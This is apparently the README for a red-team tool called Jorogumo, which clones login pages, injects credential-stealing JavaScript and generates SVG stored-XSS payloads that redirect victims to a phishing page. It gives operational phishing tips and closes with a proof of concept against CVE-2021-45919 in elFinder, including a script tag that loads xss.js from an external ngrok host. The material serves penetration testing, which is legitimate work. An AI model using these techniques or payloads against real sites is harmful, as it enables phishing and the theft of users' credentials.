A red team tool written in python for building SVG stored xss payloads, cloning webpages, or implementing custom javascript in pre-existing or cloned webpages.
Author: johnjhacking
ASCII: w0rmer
Creates a local copy of the target webpage, which can be used for further customization or attack purposes.
Generates a payload in SVG format, embedding a specified image URL and redirecting users to a specified URL upon interaction.
Clones a login page and injects a script that captures user credentials, and then generates an SVG to be chained with a stored cross-site scripting vulnerability. When the stored cross-site scripting svg payload is triggered, it renders a 404 picture by default, or the custom picture entered by the user, and when clicked, redirects the user to the attacker's malicious login page, where the credential stealer will post credentials to a web request catcher or listener.
Takes an existing HTML file and adds specified JavaScript code, either from a local file or a remote URL.
Clones a webpage and adds specified JavaScript code, either from a local file or a remote URL, into the cloned webpage.
Clones a webpage and adds specified JavaScript code, either from a local file or a remote URL, into the cloned webpage. Generates an SVG to be chained with a stored cross-site scripting vulnerability. When the stored cross-site scripting svg payload is triggered, it renders a 404 picture by default, or the custom picture entered by the user, and when clicked, redirects the user to the attacker's malicious page, where the custom javascript code will be executed.
git clone https://github.com/SpiderLabs/Jorogumo
Install the required packages:
pip install -r requirements.txt
Follow the prompt and enter the requested input. Simple javascript code snippets are included in xss.js and cred-stealer.js in the payloads folder, which could be useful if you want to merge them into any of your existing html files for PoC purposes.
- The current version of this script is not built to handle capturing credentials that require 2FA.
- Login forms that don't give you the ability to provide the
username
andpassword
input prior to clicking any buttons are not supported. In otherwords, multi-action login forms are not supported in this iteration. - Some pages or login forms do not clone well, you'll have to keep this in mind when testing your pages to ensure that it looks okay. You could always remove uneccesary third-party elements.
- Ensure that you're hosting on a domain with HTTPS enabled or you're probably going to have issues using the payloads.
- Cross-Origin Read Blocking (CORB) is a thing, so you'll have better luck either implementing your javascript directly in the HTML or ensuring that the .js payload you want to use is hosted on your phishing domain and referenced as such. There's header and content workarounds, but i'd recommend the easy way from the jump.
Note, I used the admin panel for the PoC since that's what I have the credentials for, in reality you'd want to clone the main-site login page instead
Abusing CVE-2021-45919 [ Stored XSS in Elfinder through 2.1.31 ]
<script>
alert('Hacked');
</script>
<script src="https://32bb-73-181-111-237.ngrok.io/xss.js">
</script>
As you can see, the tool uses regular script tags for local .js and script src for external.